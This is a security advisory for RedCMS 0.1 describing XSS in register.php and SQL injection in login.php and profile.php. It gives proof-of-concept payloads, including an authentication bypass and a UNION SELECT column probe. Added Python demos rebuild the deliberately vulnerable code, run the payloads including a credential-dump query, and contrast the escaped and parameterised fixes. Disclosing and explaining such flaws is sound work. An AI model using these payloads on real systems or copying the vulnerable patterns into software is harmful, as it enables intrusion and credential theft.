Multiple XSS and SQL Injection in RedCMS
Summary
- Vulnerability
- Multiple XSS and SQL Injection in RedCMS
- Discovered
- 2006.03.30
- Last Update
- 2006.04.09 Exploitation code published
- ID
- EV0115
- CVE
- CVE-2006-1568 CVE-2006-1569
- Risk Level
- medium
- Type
- Multiple Vulnerabilities
- Status
- Unpatched. No reply from developer(s)
- Vendor
- n/a
- Vulnerable Software
- RedCMS (http://redcms.co.uk/)
- Version
- 0.1
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple vulnerabilities were found in the RedCMS (http://redcms.co.uk/) script.
1. Multiple Cross-Site Scripting Vulnerabilities.
Vulnerable script: register.php
The email, location and website parameters are not sanitized before being echoed back into the page, so an attacker can inject arbitrary HTML or script code.
2. Multiple SQL Injections.
Vulnerable scripts: login.php, profile.php, register.php, ...
Variables: $username (login.php), $password (login.php), $u (profile.php), $username (register.php), $password (register.php), ... None of the user-supplied variables are sanitized before being used in SQL queries. This can be used to bypass authentication or to execute arbitrary SQL by injecting SQL code.
Condition: magic_quotes_gpc = off. With the setting on, PHP backslash-escapes quotes in request data before the script sees it, so the quote-based payloads below no longer terminate the SQL string literal.
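The attribute-context breakout described under item 1 (a value echoed back inside a single-quoted attribute, which is what the PoC shape aaa'>[XSS]<aaa aaa=' targets), as an added example that is not part of the original advisory or of RedCMS. The form markup, the field name and the concrete script element standing in for [XSS] are assumptions; the parser is only there to show what a browser's tokenizer would see before and after escaping.

```python
import html
from html.parser import HTMLParser

# Constructed payload in the shape of the advisory's PoC (aaa'>[XSS]<aaa aaa='),
# with a concrete script element standing in for the [XSS] placeholder.
XSS_PAYLOAD = "aaa'><script>alert(1)</script><aaa aaa='"


def render_vulnerable(field, value):
    """Echo a submitted registration field back into a single-quoted attribute
    without escaping. Hypothetical reconstruction of the register.php form
    re-display implied by the PoC shape, not RedCMS's own code."""
    return f"<input type='text' name='{field}' value='{value}'>"


def render_fixed(field, value):
    """Same markup, but the value is HTML-escaped with quote=True, so ' becomes
    &#x27; and < > & become entities: the value can no longer leave the attribute."""
    return f"<input type='text' name='{field}' value='{html.escape(value, quote=True)}'>"


class _TagCollector(HTMLParser):
    """Records every start tag and its (entity-decoded) attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.setdefault(tag, dict(attrs))


def parse(markup):
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p


def element_names(markup):
    """Element names a parser sees in the rendered page; anything beyond
    ['input'] means the submitted value broke out of the attribute."""
    return parse(markup).tags


def attribute_value(markup, tag, attr):
    """Attribute value after entity decoding, i.e. what the page actually holds."""
    return parse(markup).attrs.get(tag, {}).get(attr)


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        page = render("email", XSS_PAYLOAD)
        print(f"{name}: {page}")
        print(f"  elements seen by parser: {element_names(page)}")
```

The unescaped render yields three elements (input, script and the stray aaa tag), which is the injected script executing in the registration page; the escaped render yields a single input whose value attribute still round-trips to the original string, so the fix loses no data.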
PoC/Exploit
1. Cross-Site Scripting Example.
URL: http://[host]/redcms/register.php
Email: aaa'>[XSS]<aaa aaa=';
Location: aaa'>[XSS]<aaa aaa=';
Website: aaa'>[XSS]<aaa aaa=';
2. SQL Injection Examples.
URL: http://[host]/redcms/login.php
Username: ' or 1/*
Password: any
URL: http://[host]/redcms/profile.php?id=99'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
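The login bypass and the profile.php union query above, run against a live SQL engine, as an added example that is not part of the original advisory or of RedCMS. The user table schema, the query text and the profile parameter name are assumptions; SQLite is used in place of MySQL, and because SQLite's only string escape is doubling the quote, the magic_quotes_gpc stand-in doubles quotes where PHP would have backslash-escaped them. The effect the advisory's condition depends on (the attacker's quote no longer ends the literal) is the same.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the RedCMS user table; the schema is an assumption."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, website TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'adminpass', 'http://example.invalid')")
    conn.commit()
    return conn


def magic_quotes_gpc(value):
    """Stand-in for the escaping PHP applied to request data with magic_quotes_gpc on.
    PHP backslash-escaped quotes for MySQL; SQLite's only string escape is doubling
    the quote, so that is used here. Either way the quote no longer ends the literal."""
    return value.replace("'", "''")


def login_vulnerable(conn, username, password, magic_quotes=False):
    """login.php as the advisory describes it: request values interpolated into the query."""
    if magic_quotes:
        username, password = magic_quotes_gpc(username), magic_quotes_gpc(password)
    sql = f"SELECT id, username FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(sql).fetchone()


def login_fixed(conn, username, password):
    """Bound parameters: request data reaches the driver as a value, never as SQL text."""
    sql = "SELECT id, username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()


def profile_vulnerable(conn, u):
    """profile.php-style lookup; the parameter name and column list are assumptions."""
    sql = f"SELECT id, username, website FROM users WHERE id='{u}'"
    return conn.execute(sql).fetchall()


def profile_fixed(conn, u):
    return conn.execute("SELECT id, username, website FROM users WHERE id=?", (u,)).fetchall()


def union_column_count(conn, max_cols=25):
    """What the advisory's long 'union select 1,2,...,20' payload is doing: trying
    column counts until the UNION stops failing. Returns the first count that runs."""
    for n in range(1, max_cols + 1):
        payload = "99' union select " + ",".join(str(i) for i in range(1, n + 1)) + "/*"
        try:
            profile_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


if __name__ == "__main__":
    conn = make_db()
    print("bypass, magic_quotes off:", login_vulnerable(conn, "' or 1/*", "any"))
    print("bypass, magic_quotes on: ", login_vulnerable(conn, "' or 1/*", "any", magic_quotes=True))
    print("bypass, bound params:    ", login_fixed(conn, "' or 1/*", "any"))
    print("profile columns found:   ", union_column_count(conn))
    print("credential dump:         ",
          profile_vulnerable(conn, "99' union select id, username, password from users/*"))
```

With the escaping off, the username ' or 1/* turns the WHERE clause into username='' or 1 followed by a comment that swallows the password check, and the first user row (here the admin) is returned. With the escaping emulated, the same input is just a username that does not exist. Once the column count of the profile query is known, the same union trick reads any other column of any table the application's database user can see, which is why the PoC enumerates columns first.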
Solution.
Solution for "Multiple XSS and SQL Injection in RedCMS" is not available. Check vendor's website for updates.